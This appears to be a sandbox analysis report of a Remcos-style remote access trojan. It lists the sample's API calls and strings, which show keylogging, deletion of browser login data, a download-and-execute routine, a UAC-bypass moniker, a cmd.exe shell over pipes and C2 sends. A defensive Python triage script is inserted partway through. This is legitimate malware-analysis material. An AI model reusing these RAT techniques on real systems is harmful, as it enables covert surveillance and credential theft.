                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: ed14f39142b7dc807e6e03d385886ca39e93324b35c447149c6a94c081aeaa6a
                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                    • Opcode Fuzzy Hash: ed14f39142b7dc807e6e03d385886ca39e93324b35c447149c6a94c081aeaa6a
                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                    • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                    • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                    • Opcode Fuzzy Hash: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                    • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
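The records above are more than a listing: the API names, the argument constants and the String IDs are enough to tag each function with a capability automatically, which is how an analyst turns a report of this size into a capability summary. The script below is an added example, not Joe Sandbox or Remcos code. It parses four records copied in abbreviated form from this page (the pipe-backed cmd.exe shell, the CMSTPLUA elevation moniker, the WH_KEYBOARD_LL hook and the Firefox login-store clearing) and applies a rule table that is this example's own assumption; the watchdog and clipboard rules cover records that are not in the embedded sample.

```python
"""Capability triage over Joe Sandbox 'IDA Plugin' function records (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: abbreviated copies of four records shown on this page.
SAMPLE_REPORT = r"""APIs
• CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
• CloseHandle.KERNEL32 ref: 00405A23
Similarity
• String ID: 0lG$0lG$SystemDrive$cmd.exe$kG
APIs
• _wcslen.LIBCMT ref: 00407521
• CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
Similarity
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
APIs
• SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
Similarity
• String ID: Keylogger initialization failure: error
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Similarity
• String ID: [Firefox StoredLogins Cleared!]$UserProfile$\key3.db$\logins.json
"""

# One API bullet: optional "Part of subcall" prefix, Name.MODULE, optional (args), "ref: addr".
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STR_RE = re.compile(r"•\s*String ID:\s*(?P<s>.*)")   # entries are '$'-separated


@dataclass
class Record:
    apis: list = field(default_factory=list)      # (name, module, [arg, ...]) per call
    strings: list = field(default_factory=list)   # String ID entries


def parse_records(text):
    """Split the report into records; each 'APIs' heading opens a new one."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        m = STR_RE.match(line)
        if m:
            if cur is None:                       # record with no API section
                cur = Record()
                records.append(cur)
            cur.strings.extend(p for p in m["s"].split("$") if p)
            continue
        m = API_RE.search(line)
        if m and cur is not None:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.apis.append((m["name"], m["module"], args))
    return records


def _hex(arg):
    """Argument as an int, or None for unresolved ('?') values."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


WH_KEYBOARD_LL = 0x0D                               # SetWindowsHookEx idHook 13
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
FIREFOX_STORES = ("\\logins.json", "\\key3.db", "\\cookies.sqlite")


def classify(rec):
    """Rule table (this example's own assumption) mapping a record to capabilities."""
    names = {n for n, _, _ in rec.apis}
    text = "\n".join(rec.strings)
    caps = set()
    if {"CreatePipe", "CreateProcessA", "PeekNamedPipe"} <= names and "cmd.exe" in text:
        caps.add("remote-shell")                    # cmd.exe driven through anonymous pipes
    if "CoGetObject" in names and "Elevation:Administrator!new:" in text and CMSTPLUA_CLSID in text:
        caps.add("uac-bypass-cmstplua")             # elevated COM object via the elevation moniker
    if any(n.startswith("SetWindowsHookEx") and a and _hex(a[0]) == WH_KEYBOARD_LL
           for n, _, a in rec.apis):
        caps.add("keylogger-ll-hook")               # only the low-level keyboard hook counts
    if any(s in text for s in FIREFOX_STORES) and names & {"FindFirstFileA", "FindFirstFileW", "DeleteFileA"}:
        caps.add("browser-credential-wipe")
    if {"OpenClipboard", "GetClipboardData"} <= names:
        caps.add("clipboard-capture")
    if "Watchdog module activated" in text or "Remcos restarted by watchdog!" in text:
        caps.add("watchdog")
    if "send" in names:
        caps.add("c2-send")                         # result leaves on the C2 socket
    return caps


def triage(text):
    return [classify(r) for r in parse_records(text)]


if __name__ == "__main__":
    for i, caps in enumerate(triage(SAMPLE_REPORT)):
        print(i, sorted(caps))
```

The hook rule keys on the first argument, 0000000D (WH_KEYBOARD_LL = 13), not on the API name alone, because WH_KEYBOARD or WH_MOUSE hooks are common in benign software; the CMSTPLUA rule requires both the moniker prefix and the CLSID so a stray GUID in an unrelated function does not fire it.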
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                    • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                    • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: 7d52df1408e09a8eb3982e7da52f878f0a451a5f56a7a2098f3d013e22341463
                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                    • Opcode Fuzzy Hash: 7d52df1408e09a8eb3982e7da52f878f0a451a5f56a7a2098f3d013e22341463
                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • UserProfile, xrefs: 0040BA1E
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 5.0.0 Pro$override$pth_unenc
                                    • API String ID: 2281282204-3992771774
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                                    • GetACP.KERNEL32 ref: 00452513
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID:
                                    • API String ID: 745075371-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$open
                                    • API String ID: 2825088817-1832597450
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    APIs
